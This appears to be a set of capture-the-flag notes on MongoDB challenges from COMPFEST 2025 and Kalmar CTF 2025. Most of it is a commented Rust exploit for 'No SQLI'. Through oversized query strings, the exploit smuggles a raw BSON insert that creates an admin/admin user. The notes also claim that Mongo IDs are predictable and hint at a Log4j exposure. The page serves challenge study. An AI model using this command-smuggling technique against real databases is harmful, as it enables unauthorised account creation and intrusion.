Mongo ID can be predicted
| Event Name | COMPFEST 2025 |
| GitHub URL | - |
| Challenge Name | Gift for the Tifosi |
Attachments
References
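This MongoDB version is vulnerable to Log4j. Note that the reference below concerns log4j as bundled with Progress DataDirect, so confirm which component in the deployment actually ships log4j: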
https://community.progress.com/s/article/blackduck-identified-vulnerability-with-mongodb#:~:text=BlackDuck%20identified%20vulnerability%20log4j%201.2.25%20in%20Progress%20DataDirect,log4j%20can%20lead%20to%20remote%20arbitrary%20code%20execution.
Mongo
| Event Name | Kalmar CTF 2025 |
| GitHub URL | https://github.com/kalmarunionenctf/kalmarctf/tree/main/2025 |
| Challenge Name | No SQLI |
Attachments
Downside: this approach requires sending a payload of about 4 GB.
use mongodb::{bson::doc, Client, options::ClientOptions, Collection};
use mongodb::error::Result;
use mongodb::bson::Document;
/// CTF proof-of-concept client for the "No SQLI" challenge noted above.
///
/// Connects to a local MongoDB instance (`mydb.users`) and issues one
/// `find_one` query whose `u` and `p` fields are very large strings built
/// from fixed byte sequences, then prints whether a document matched.
///
/// The exact byte layout depends on the order of the `push_str` calls below;
/// the mechanism the challenge relies on is not shown in this listing.
///
/// NOTE(review): both fields are far larger than any plausible credential.
/// An application that caps the length of user-supplied fields before they
/// reach the driver would presumably reject this input. Confirm against the
/// challenge source.
#[tokio::main]
async fn main() -> Result<()> {
// Target is a local, unauthenticated MongoDB instance on the default port.
let client_uri = "mongodb://localhost:27017";
let client_options = ClientOptions::parse(client_uri).await?;
let client = Client::with_options(client_options)?;
let collection: Collection<Document> = client.database("mydb").collection("users");
// `u` field, part 1: a short run of 'a' characters that everything else is appended to.
let mut username_padding: String = "aaaaaaaaa".to_string();
// `u` field, part 2: a short fixed sequence (0x15 followed by NUL bytes) repeated
// 27962023 times, i.e. hundreds of megabytes held in memory.
let real_nop_slide = "\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".repeat(27962023);
// `u` field, part 3: a single 0x21 byte followed by 0x20 NUL bytes.
let last_nop_slide = format!("{}{}", "\x21", "\x00".repeat(0x20));
// `p` field prefix: a single 0x07 byte; `message` is appended to it further down.
let mut custom_char: String = "\x07".to_owned();
// Short trailing value appended to the `u` field; also the only value echoed in the output.
let username = "l\x00\x00\x00\x00";
username_padding.push_str(&real_nop_slide);
username_padding.push_str(&last_nop_slide);
username_padding.push_str(&username);
// Author's note: minus 2 for the padding and minus 94 for the raw message size.
// The result is a filler of 0xdd000000 - 96 'a' characters (several gigabytes),
// which matches the "about 4 GB payload" drawback noted in the write-up.
// NOTE(review): assumes a 64-bit `usize` and enough RAM for the allocation.
let payload: String = "a".repeat(0xdd000000-2-94);
// Fixed literal with embedded, command-like fields: `insert`, `users`, `documents`,
// `u`/`p` both set to `admin`, and `$db` set to `mydb`.
let mut message: String = "\x00\x00\x00\x00\x00\x00\x00W\x00\x00\x00\x02insert\x00\x06\x00\x00\x00users\x00\x04documents\x00'\x00\x00\x00\x030\x00\x1f\x00\x00\x00\x02u\x00\x06\x00\x00\x00admin\x00\x02p\x00\x06\x00\x00\x00admin\x00\x00\x00\x02$db\x00\x05\x00\x00\x00mydb\x00\x00".to_string();
message.push_str(&payload);
custom_char.push_str(&message);
// Single query carrying both oversized strings as ordinary BSON string fields.
match collection.find_one(doc! { "u": &username_padding, "p": &custom_char }, None).await {
Ok(Some(_user)) => {
// A document matched the filter. The message prints the short `username`
// literal, not the full padded `u` value that was sent.
println!("OK: Authentification réussie pour l'utilisateur '{}'", username);
},
Ok(None) => {
// The query ran but no document matched.
println!("NOK: Identifiants invalides pour l'utilisateur '{}'", username);
},
Err(err) => {
// Driver or server error, which is reported but not propagated, so `main`
// still returns `Ok(())`.
println!("Erreur MongoDB: {}", err);
}
}
Ok(())
}